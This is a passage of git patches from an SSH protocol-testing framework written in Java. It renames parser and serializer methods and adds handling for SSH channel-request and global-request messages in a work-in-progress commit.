LOGGER.info("Parsing Authenticationmethod: Interactive"); + ChannelRequestSignalMessage channelRequestSignalMessage = + new ChannelRequestSignalMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelRequestSignalMessage, context, temp_stream); + case EXIT_STATUS: + LOGGER.info("Parsing Authenticationmethod: Interactive"); + ChannelRequestExitStatusMessage channelRequestExitStatusMessage = + new ChannelRequestExitStatusMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelRequestExitStatusMessage, context, temp_stream); + case EXIT_SIGNAL: + LOGGER.info("Parsing Authenticationmethod: Interactive"); + ChannelRequestExitSignalMessage channelRequestExitSignalMessage = + new ChannelRequestExitSignalMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelRequestExitSignalMessage, context, temp_stream); + case AUTH_AGENT_REQ_OPENSSH_COM: + LOGGER.info("Parsing Authenticationmethod: Interactive"); + ChannelRequestAuthAgentMessage channelRequestAuthAgentMessage = + new ChannelRequestAuthAgentMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + channelRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(channelRequestAuthAgentMessage, context, temp_stream); + default: + LOGGER.debug( + "Received unimplemented user authentication method in user authentication request: {}", + requestType); + break; + } + + LOGGER.info("Done with Parsing UserAuth"); + } + + private void readGlobalRequest() { + GlobalRequestUnknownMessage globalRequestUnknownMessage = new GlobalRequestUnknownMessage(); + HintedInputStream inputStream; + HintedInputStream temp_stream; + try { + inputStream = getLowerLayer().getDataStream(); + } catch (IOException e) { + LOGGER.warn("The lower layer did not produce a data stream: ", e); + return; + } + GlobalRequestUnknownMessageParser parser = + new GlobalRequestUnknownMessageParser(inputStream); + parser.parse(globalRequestUnknownMessage); + String requestTypeString = globalRequestUnknownMessage.getRequestName().getValue(); + GlobalRequestType requestType = GlobalRequestType.fromName(requestTypeString); + switch (requestType) { + case TCPIP_FORWARD: + GlobalRequestTcpIpForwardMessage tcpIpForwardMessage = + new GlobalRequestTcpIpForwardMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + globalRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(tcpIpForwardMessage, context, temp_stream); + case CANCEL_TCPIP_FORWARD: + GlobalRequestCancelTcpIpForwardMessage cancelTcpIpForwardMessage = + new GlobalRequestCancelTcpIpForwardMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + globalRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(cancelTcpIpForwardMessage, context, temp_stream); + case NO_MORE_SESSIONS_OPENSSH_COM: + GlobalRequestNoMoreSessionsMessage noMoreSessionsMessage = + new GlobalRequestNoMoreSessionsMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + globalRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(noMoreSessionsMessage, context, temp_stream); + case HOSTKEYS_00_OPENSSH_COM: + GlobalRequestOpenSshHostKeysMessage openSshHostKeysMessage = + new GlobalRequestOpenSshHostKeysMessage(); + temp_stream = + new HintedInputStreamAdapterStream( + null, + new ByteArrayInputStream( + globalRequestUnknownMessage + .getCompleteResultingMessage() + .getOriginalValue())); + readContainerFromStream(openSshHostKeysMessage, context, temp_stream); + default: + LOGGER.debug( + "Received unimplemented channel open message type: {}", requestTypeString); + } + } + private void readServiceRequestData() { ServiceRequestMessage message = new ServiceRequestMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java index 4bd76e6d1..2dab5fdfd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java @@ -27,7 +27,7 @@ public ChannelCloseMessageParser(InputStream stream) { @Override public void parse(ChannelCloseMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java index d170f85ed..13417db90 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java @@ -33,7 +33,7 @@ public ChannelDataMessageParser(InputStream stream) { @Override public void parse(ChannelDataMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParser.java index c525bdd30..48ef9dc92 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParser.java @@ -27,7 +27,7 @@ public ChannelEofMessageParser(InputStream stream) { @Override public void parse(ChannelEofMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java index a5dc823bf..5902ac631 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java @@ -34,7 +34,7 @@ public ChannelExtendedDataMessageParser(InputStream stream) { @Override public void parse(ChannelExtendedDataMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java index 8163ae33c..9f3a31e9d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java @@ -27,7 +27,7 @@ public ChannelFailureMessageParser(InputStream stream) { @Override public void parse(ChannelFailureMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java index 0dcc17381..45463243f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java @@ -28,7 +28,7 @@ public ChannelOpenConfirmationMessageParser(byte[] array, int startPosition) { @Override public void parse(ChannelOpenConfirmationMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } public ChannelOpenConfirmationMessageParser(InputStream stream) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java index bb5204c29..93d33a664 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java @@ -34,7 +34,7 @@ public ChannelOpenFailureMessageParser(InputStream stream) { @Override public void parse(ChannelOpenFailureMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java index 178f406ed..878c7f56a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java @@ -27,7 +27,7 @@ public ChannelOpenSessionMessageParser(InputStream stream) { @Override public void parse(ChannelOpenSessionMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java index 0971c979d..4c162c48f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java @@ -33,7 +33,8 @@ public ChannelOpenUnknownMessageParser(InputStream stream) { @Override public void parse(ChannelOpenUnknownMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); + message.setCompleteResultingMessage(getAlreadyParsed()); } /* @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java index 289a43dff..440540a2d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java @@ -28,7 +28,7 @@ public ChannelRequestAuthAgentMessageParser(InputStream stream) { @Override public void parse(ChannelRequestAuthAgentMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java index 5d63a90b6..715498a3b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java @@ -32,7 +32,7 @@ public ChannelRequestBreakMessageParser(InputStream stream) { @Override public void parse(ChannelRequestBreakMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java index 88e839770..becb2b359 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java @@ -35,7 +35,7 @@ public ChannelRequestEnvMessageParser(InputStream stream) { @Override public void parse(ChannelRequestEnvMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java index 445f7d83b..83d4003b4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java @@ -33,7 +33,7 @@ public ChannelRequestExecMessageParser(InputStream stream) { @Override public void parse(ChannelRequestExecMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java index 4fea2f142..89d2f1e53 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitSignalMessageParser.java @@ -36,7 +36,7 @@ public ChannelRequestExitSignalMessageParser(InputStream stream) { @Override public void parse(ChannelRequestExitSignalMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java index 73a147e1c..cf3ca071f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExitStatusMessageParser.java @@ -34,7 +34,7 @@ public ChannelRequestExitStatusMessageParser(InputStream stream) { @Override public void parse(ChannelRequestExitStatusMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /*@Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestPtyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestPtyMessageParser.java index ecf23dacc..d12c64d54 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestPtyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestPtyMessageParser.java @@ -32,7 +32,7 @@ public ChannelRequestPtyMessageParser(InputStream stream) { @Override public void parse(ChannelRequestPtyMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestShellMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestShellMessageParser.java index 40b7bcd13..dc2dc4e48 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestShellMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestShellMessageParser.java @@ -25,7 +25,7 @@ public ChannelRequestShellMessageParser(InputStream stream) { @Override public void parse(ChannelRequestShellMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java index 75ea4e314..7cfc1bbb1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSignalMessageParser.java @@ -33,7 +33,7 @@ public ChannelRequestSignalMessageParser(InputStream stream) { @Override public void parse(ChannelRequestSignalMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java index 31124a903..4745d12ed 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestSubsystemMessageParser.java @@ -35,7 +35,7 @@ public ChannelRequestSubsystemMessageParser(InputStream stream) { @Override public void parse(ChannelRequestSubsystemMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java index 9f5f18f65..a34662b6c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestUnknownMessageParser.java @@ -32,7 +32,8 @@ public ChannelRequestUnknownMessageParser(InputStream stream) { @Override public void parse(ChannelRequestUnknownMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); + message.setCompleteResultingMessage(getAlreadyParsed()); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java index b4a9f55ae..06ba84c5b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestWindowChangeMessageParser.java @@ -33,7 +33,7 @@ public ChannelRequestWindowChangeMessageParser(InputStream stream) { @Override public void parse(ChannelRequestWindowChangeMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java index 38e842fcb..f0b08ac58 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestX11MessageParser.java @@ -91,6 +91,6 @@ protected void parseMessageSpecificContents(ChannelRequestX11Message message) { @Override public void parse(ChannelRequestX11Message message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java index c71246234..37a049995 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestXonXoffMessageParser.java @@ -33,7 +33,7 @@ public ChannelRequestXonXoffMessageParser(InputStream stream) { @Override public void parse(ChannelRequestXonXoffMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java index d287a66bb..af403c6ad 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelSuccessMessageParser.java @@ -28,7 +28,7 @@ public ChannelSuccessMessageParser(InputStream stream) { @Override public void parse(ChannelSuccessMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java index 7dad15804..dd6e41a06 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelWindowAdjustMessageParser.java @@ -33,7 +33,7 @@ public ChannelWindowAdjustMessageParser(InputStream stream) { @Override public void parse(ChannelWindowAdjustMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java index 59f7c2634..b42414c90 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestCancelTcpIpForwardMessageParser.java @@ -32,7 +32,7 @@ public GlobalRequestCancelTcpIpForwardMessageParser(InputStream stream) { @Override public void parse(GlobalRequestCancelTcpIpForwardMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } private void parseIPAddressToBind(GlobalRequestCancelTcpIpForwardMessage message) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java index 75255289c..8638e90c0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestFailureMessageParser.java @@ -29,7 +29,7 @@ public GlobalRequestFailureMessageParser(InputStream stream) { @Override public void parse(GlobalRequestFailureMessage globalRequestFailureMessage) { - parseMessageSpecificContents(globalRequestFailureMessage); + parseProtocolMessageContents(globalRequestFailureMessage); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestNoMoreSessionsMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestNoMoreSessionsMessageParser.java index cb1eb9f27..15205ddd2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestNoMoreSessionsMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestNoMoreSessionsMessageParser.java @@ -28,7 +28,7 @@ public GlobalRequestNoMoreSessionsMessageParser(InputStream stream) { @Override public void parse(GlobalRequestNoMoreSessionsMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java index 9c64e5bbe..6583f761b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java @@ -33,7 +33,7 @@ public GlobalRequestOpenSshHostKeysMessageParser(InputStream stream) { @Override public void parse(GlobalRequestOpenSshHostKeysMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } private void parseHostKeys(GlobalRequestOpenSshHostKeysMessage message) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java index 1ade25dc5..1f2bb6bec 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java @@ -29,7 +29,7 @@ public GlobalRequestSuccessMessageParser(InputStream stream) { @Override public void parse(GlobalRequestSuccessMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java index 63f572aa2..5f51729fc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java @@ -35,7 +35,7 @@ public GlobalRequestTcpIpForwardMessageParser(InputStream stream) { @Override public void parse(GlobalRequestTcpIpForwardMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } private void parseIPAddressToBind(GlobalRequestTcpIpForwardMessage message) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java index 1c0520aaa..9c4228e73 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java @@ -32,7 +32,8 @@ public GlobalRequestUnknownMessageParser(InputStream stream) { @Override public void parse(GlobalRequestUnknownMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); + message.setCompleteResultingMessage(getAlreadyParsed()); } /*@Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java index df9924210..ce87c671f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java @@ -33,7 +33,7 @@ public void serializeMessageSpecificContents() { @Override protected byte[] serializeBytes() { - serializeMessageSpecificContents(); + serializeProtocolMessageContents(); return getAlreadySerialized(); } } From 48e66b30a0d21e8a2a5a7d73064191a43d8bf90c Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 9 Jul 2023 13:48:37 +0200 Subject: [PATCH 034/176] wip: channel client is working too --- .../core/layer/impl/SSH2Layer.java | 68 +++++++++++++++++++ .../parser/UserAuthFailureMessageParser.java | 2 +- .../UserAuthHostbasedMessageParser.java | 2 +- .../UserAuthInfoRequestMessageParser.java | 2 +- .../UserAuthInfoResponseMessageParser.java | 2 +- ...rAuthKeyboardInteractiveMessageParser.java | 2 +- .../parser/UserAuthSuccessMessageParser.java | 2 +- .../ChannelOpenMessageSerializer.java | 2 +- ...GlobalRequestFailureMessageSerializer.java | 2 +- .../GlobalRequestMessageSerializer.java | 2 +- ...GlobalRequestSuccessMessageSerializer.java | 2 +- 11 files changed, 78 insertions(+), 10 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index c987854c7..acfeba4ef 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -428,6 +428,34 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_GLOBAL_REQUEST: readGlobalRequest(); break; + case SSH_MSG_USERAUTH_SUCCESS: + 